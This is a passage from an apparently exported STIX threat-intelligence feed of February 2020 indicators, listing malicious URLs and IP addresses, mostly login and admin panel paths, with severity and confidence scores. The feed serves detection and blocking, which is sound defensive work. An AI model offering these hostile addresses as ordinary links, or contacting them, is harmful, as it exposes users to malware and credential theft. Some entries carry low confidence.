CyberCrime","id":"indicator--8d5e44f6-7283-40f8-b9b3-2c4791832c4e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-03T01:59:33.587Z","name":"mal_url: http://anorelier.hk/fshblfn8071/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://anorelier.hk/fshblfn8071/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:33.587Z"} +{"created":"2020-02-03T01:59:54.52Z","description":"TS ID: 55283402099; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--f33dd90a-b849-42af-9bcb-f60476358305","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-03T01:59:54.52Z","name":"mal_url: http://bendetta.online/mangooste/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bendetta.online/mangooste/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:54.52Z"} +{"created":"2020-02-03T01:59:54.544Z","description":"TS ID: 55283402097; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime","id":"indicator--27f2f598-95d6-4e35-a42e-240093d4452d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-03T01:59:54.544Z","name":"mal_url: http://kayfundz.ru/kay/eng/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kayfundz.ru/kay/eng/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:54.544Z"} +{"created":"2020-02-05T01:58:09.73Z","description":"TS ID: 55287965572; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--65a8989b-25c3-498e-8247-0514d5aa719e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-05T01:58:09.73Z","name":"mal_url: http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:09.73Z"} +{"created":"2020-02-05T01:58:17.365Z","description":"TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e531a668-ef25-4b16-aa50-1b0b8f0f901e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-05T01:58:17.365Z","name":"mal_url: http://193.142.59.7/hoist3/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.7/hoist3/logs/omc.php']","type":"indicator","valid_from":"2020-02-05T01:58:17.365Z"} +{"created":"2020-02-05T01:58:17.428Z","description":"TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime","id":"indicator--7aed3145-aab6-470d-bb4f-592d86654719","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-02-05T01:58:17.428Z","name":"mal_ip: 46.29.161.60","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '46.29.161.60']","type":"indicator","valid_from":"2020-02-05T01:58:17.428Z"} +{"created":"2020-02-05T01:58:31.683Z","description":"TS ID: 55287965571; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--af8e5326-c1d4-4f9e-8f47-ee23c6a2606a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-05T01:58:31.683Z","name":"mal_url: http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:31.683Z"} +{"created":"2020-02-05T01:58:31.704Z","description":"TS ID: 55287965557; iType: mal_url; State: active; Org: 1&1 Internet AG; Source: CyberCrime","id":"indicator--59c28566-62b0-4102-ad17-53ec3a143144","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-05T01:58:31.704Z","name":"mal_url: http://217.160.59.64/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.160.59.64/panel/admin.php']","type":"indicator","valid_from":"2020-02-05T01:58:31.704Z"} +{"created":"2020-02-05T01:58:32.111Z","description":"TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--56524b03-3217-40a0-9180-dc8262b3b6f9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-05T01:58:32.111Z","name":"mal_url: http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:32.111Z"} +{"created":"2020-02-05T01:58:32.145Z","description":"TS ID: 55287965577; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--69661075-e6cb-4054-820c-61954757f0ba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-05T01:58:32.145Z","name":"mal_url: http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:32.145Z"} +{"created":"2020-02-05T01:58:34.795Z","description":"TS ID: 55287965581; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime","id":"indicator--5be6be50-c2ef-4502-857e-f69dd17d37a9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-05T01:58:34.795Z","name":"mal_url: http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:34.795Z"} +{"created":"2020-02-05T01:58:34.836Z","description":"TS ID: 55287965567; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7de3f68d-51ed-43c0-b5d9-c63d621aa99f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-05T01:58:34.836Z","name":"mal_url: http://domainmanagerz.net/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://domainmanagerz.net/login']","type":"indicator","valid_from":"2020-02-05T01:58:34.836Z"} +{"created":"2020-02-05T01:58:41.381Z","description":"TS ID: 55287965564; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime","id":"indicator--08ec347d-3d22-45e6-96fc-3fc3bb37c720","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-05T01:58:41.381Z","name":"mal_url: http://groupbizconsulting.com/p3/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://groupbizconsulting.com/p3/webpanel/login.php']","type":"indicator","valid_from":"2020-02-05T01:58:41.381Z"} +{"created":"2020-02-05T01:58:59.279Z","description":"TS ID: 55287965569; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--b845a78e-d141-455e-92ff-df401787a3cd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-05T01:58:59.279Z","name":"mal_url: http://samundarmarine.com/denty/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samundarmarine.com/denty/admin.php']","type":"indicator","valid_from":"2020-02-05T01:58:59.279Z"} +{"created":"2020-02-05T01:59:03.426Z","description":"TS ID: 55287965563; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime","id":"indicator--e9d4f82a-bc23-4f9a-81e0-05097acc6daa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-05T01:59:03.426Z","name":"mal_url: http://groupbizconsulting.com/p4/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://groupbizconsulting.com/p4/webpanel/login.php']","type":"indicator","valid_from":"2020-02-05T01:59:03.426Z"} +{"created":"2020-02-05T01:59:04.695Z","description":"TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime","id":"indicator--57e76166-d475-4027-b2d9-b4910c5b0747","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-02-05T01:59:04.695Z","name":"mal_ip: 138.201.56.185","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '138.201.56.185']","type":"indicator","valid_from":"2020-02-05T01:59:04.695Z"} +{"created":"2020-02-05T01:59:06.271Z","description":"TS ID: 55287965580; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--63fdc395-3d7f-4435-a7ea-2c26783ea7b9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-05T01:59:06.271Z","name":"mal_url: http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:59:06.271Z"} +{"created":"2020-02-05T01:59:24.611Z","description":"TS ID: 55287965562; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--9ed89f91-5df1-4cad-b6e7-9d275759d32e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-05T01:59:24.611Z","name":"mal_url: http://ipblasta.com/kmaker/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ipblasta.com/kmaker/login.php']","type":"indicator","valid_from":"2020-02-05T01:59:24.611Z"} +{"created":"2020-02-05T01:59:31.341Z","description":"TS ID: 55287965559; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime","id":"indicator--421221e0-b0c7-4bbe-a12c-412f689f4769","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-05T01:59:31.341Z","name":"mal_url: http://softtouchcollars.com/origin/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://softtouchcollars.com/origin/login.php']","type":"indicator","valid_from":"2020-02-05T01:59:31.341Z"} +{"created":"2020-02-05T01:59:47.461Z","description":"TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--369ccb92-5a3b-41cf-853f-dac750e7a9d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-02-05T01:59:47.461Z","name":"mal_ip: 162.241.216.92","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.241.216.92']","type":"indicator","valid_from":"2020-02-05T01:59:47.461Z"} +{"created":"2020-02-05T01:59:47.506Z","description":"TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--5fb846be-33fa-4bcb-ac9f-ad6a31e4daef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-05T01:59:47.506Z","name":"mal_ip: 89.208.84.96","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.208.84.96']","type":"indicator","valid_from":"2020-02-05T01:59:47.506Z"} +{"created":"2020-02-05T02:00:16.19Z","description":"TS ID: 55287965578; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--1a4e59e6-28dd-4087-9a19-b5d274d484d5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-96"],"modified":"2020-02-05T02:00:16.19Z","name":"mal_url: http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:00:16.19Z"} +{"created":"2020-02-05T02:00:23.009Z","description":"TS ID: 55287965575; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--aef5784f-1ba2-4f45-9345-9b96bffe3cfd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-05T02:00:23.009Z","name":"mal_url: http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:00:23.009Z"} +{"created":"2020-02-05T02:00:29.679Z","description":"TS ID: 55287965579; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--5fbeda08-8cf4-459a-873c-28cef82221b5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-05T02:00:29.679Z","name":"mal_url: http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:00:29.679Z"} +{"created":"2020-02-05T02:00:52.297Z","description":"TS ID: 55287965570; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--b4e748c7-0beb-4b0f-a234-938ad9a6b884","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-05T02:00:52.297Z","name":"mal_url: http://futuracosmetic.com/frank/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://futuracosmetic.com/frank/admin.php']","type":"indicator","valid_from":"2020-02-05T02:00:52.297Z"} +{"created":"2020-02-05T02:00:57.141Z","description":"TS ID: 55287965588; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--320c2f41-7546-4aa7-afef-5188df844448","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-05T02:00:57.141Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/tel/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/tel/uMc.php']","type":"indicator","valid_from":"2020-02-05T02:00:57.141Z"} +{"created":"2020-02-05T02:00:57.172Z","description":"TS ID: 55287965586; iType: mal_url; State: active; Org: Hetzner Online GmbH; Source: CyberCrime","id":"indicator--18a1307c-2dfc-43f9-9e47-93d00c63efcc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-02-05T02:00:57.172Z","name":"mal_url: http://video-ld.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://video-ld.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-05T02:00:57.172Z"} +{"created":"2020-02-05T02:00:57.733Z","description":"TS ID: 55287965560; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--1e94e26d-5158-4519-b166-2b7e87c2e5de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-05T02:00:57.733Z","name":"mal_url: http://nortonlilly.info/emma/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/emma/login.php']","type":"indicator","valid_from":"2020-02-05T02:00:57.733Z"} +{"created":"2020-02-05T02:01:03.604Z","description":"TS ID: 55287965573; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime","id":"indicator--e396f12a-867b-4e91-8796-d042aef55ce3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-05T02:01:03.604Z","name":"mal_url: http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:01:03.604Z"} +{"created":"2020-02-05T02:01:16.051Z","description":"TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--5b35dbd2-4915-4c56-9213-7d5272715cb7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-05T02:01:16.051Z","name":"mal_ip: 170.106.50.37","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '170.106.50.37']","type":"indicator","valid_from":"2020-02-05T02:01:16.051Z"} +{"created":"2020-02-05T02:01:18.261Z","description":"TS ID: 55287965582; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--8dff68c1-1114-4092-9f29-f655f27d2337","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-60"],"modified":"2020-02-05T02:01:18.261Z","name":"mal_url: http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:01:18.261Z"} +{"created":"2020-02-05T02:01:18.285Z","description":"TS ID: 55287965565; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--19636e7d-febc-4ae1-879a-28af129c19b3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-60"],"modified":"2020-02-05T02:01:18.285Z","name":"mal_url: http://credoaz.com/journals/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://credoaz.com/journals/webpanel/login.php']","type":"indicator","valid_from":"2020-02-05T02:01:18.285Z"} +{"created":"2020-02-05T02:01:21.73Z","description":"TS ID: 55287965587; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--593225c7-68c8-44db-82bf-2c550931a60c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-05T02:01:21.73Z","name":"mal_url: http://bestlogs.myjino.ru/best/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bestlogs.myjino.ru/best/admin.php']","type":"indicator","valid_from":"2020-02-05T02:01:21.73Z"} +{"created":"2020-02-06T02:10:08.953Z","description":"TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime","id":"indicator--782e9560-3f13-43eb-9720-e5b43d9a8dd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:10:08.953Z","name":"mal_url: http://46.229.215.123/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://46.229.215.123/login']","type":"indicator","valid_from":"2020-02-06T02:10:08.953Z"} +{"created":"2020-02-06T02:10:15.947Z","description":"TS ID: 55290730799; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--9586420f-3737-47b6-8d58-526f629d66e2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-06T02:10:15.947Z","name":"mal_url: http://justwer.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://justwer.site/login']","type":"indicator","valid_from":"2020-02-06T02:10:15.947Z"} +{"created":"2020-02-06T02:10:15.988Z","description":"TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime","id":"indicator--4d0f3370-af7d-4902-abea-65d9f924458b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-06T02:10:15.988Z","name":"mal_ip: 173.247.252.61","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '173.247.252.61']","type":"indicator","valid_from":"2020-02-06T02:10:15.988Z"} +{"created":"2020-02-06T02:10:22.051Z","description":"TS ID: 55290730781; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--12dac6fb-e53b-4742-9cc4-da362e880571","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-06T02:10:22.051Z","name":"mal_url: http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-06T02:10:22.051Z"} +{"created":"2020-02-06T02:10:23.024Z","description":"TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--d5c7a00c-4ab5-4501-b79c-4e96838e5602","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-06T02:10:23.024Z","name":"mal_ip: 91.215.169.220","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.215.169.220']","type":"indicator","valid_from":"2020-02-06T02:10:23.024Z"} +{"created":"2020-02-06T02:10:35.597Z","description":"TS ID: 55290730780; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--524c1a55-264d-4f41-a854-1f0601921675","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-06T02:10:35.597Z","name":"mal_url: http://f0378370.xsph.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0378370.xsph.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-06T02:10:35.597Z"} +{"created":"2020-02-06T02:10:59.132Z","description":"TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime","id":"indicator--d8d588e2-5ab4-4937-9051-ae93e79c0204","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:10:59.132Z","name":"mal_url: http://85.204.116.145/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://85.204.116.145/login']","type":"indicator","valid_from":"2020-02-06T02:10:59.132Z"} +{"created":"2020-02-06T02:11:08.205Z","description":"TS ID: 55290730776; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--6b38040c-6578-43c4-8cec-a426d1079a96","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-06T02:11:08.205Z","name":"mal_url: http://f0396918.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396918.xsph.ru/login']","type":"indicator","valid_from":"2020-02-06T02:11:08.205Z"} +{"created":"2020-02-06T02:11:15.653Z","description":"TS ID: 55290730807; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--22ba0c46-ef00-43cc-a2e1-ff75417cf11d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-06T02:11:15.653Z","name":"mal_url: http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-06T02:11:15.653Z"} +{"created":"2020-02-06T02:11:17.072Z","description":"TS ID: 55290730801; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--257bcf28-e6ee-46e8-b9fe-d192fdc7c959","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:11:17.072Z","name":"mal_url: http://l5056942.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l5056942.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:11:17.072Z"} +{"created":"2020-02-06T02:11:17.098Z","description":"TS ID: 55290730797; iType: mal_url; State: active; Org: LLC Eximius; Source: CyberCrime","id":"indicator--788aa60d-57c8-4a4c-9666-d6869ccd6c49","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:11:17.098Z","name":"mal_url: http://h146438.s21.test-hf.su/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://h146438.s21.test-hf.su/index.php']","type":"indicator","valid_from":"2020-02-06T02:11:17.098Z"} +{"created":"2020-02-06T02:11:27.123Z","description":"TS ID: 55290730782; iType: mal_url; State: active; Org: Hotwire Fision; Source: CyberCrime","id":"indicator--29909afa-ad21-493c-b420-870dbc8dd0da","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:11:27.123Z","name":"mal_url: http://tranpip.com/vla/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tranpip.com/vla/panel/admin.php']","type":"indicator","valid_from":"2020-02-06T02:11:27.123Z"} +{"created":"2020-02-06T02:11:37.189Z","description":"TS ID: 55290730803; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--eb5264f6-1f6e-4d1e-a813-d668ef8e6e0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-06T02:11:37.189Z","name":"mal_url: http://l1430a3c.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l1430a3c.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:11:37.189Z"} +{"created":"2020-02-06T02:12:51.488Z","description":"TS ID: 55290730778; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--c5829f98-8034-4bab-b591-9d3fbda9f448","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-06T02:12:51.488Z","name":"mal_url: http://f0391270.xsph.ru/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391270.xsph.ru/dashboard/admin.php']","type":"indicator","valid_from":"2020-02-06T02:12:51.488Z"} +{"created":"2020-02-06T02:12:52.562Z","description":"TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime","id":"indicator--14575771-256c-4f2f-b4bc-7b96c6805b24","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-06T02:12:52.562Z","name":"mal_url: http://85.204.116.144/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://85.204.116.144/login']","type":"indicator","valid_from":"2020-02-06T02:12:52.562Z"} +{"created":"2020-02-06T02:13:24.038Z","description":"TS ID: 55290730798; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--41ca379f-0e97-452f-bed7-0dcaa6509a87","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:13:24.038Z","name":"mal_url: http://xmpzi.icu/blue/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xmpzi.icu/blue/index.php']","type":"indicator","valid_from":"2020-02-06T02:13:24.038Z"} +{"created":"2020-02-06T02:13:26.405Z","description":"TS ID: 55290730786; iType: mal_url; State: active; Org: QuadraNet; Source: 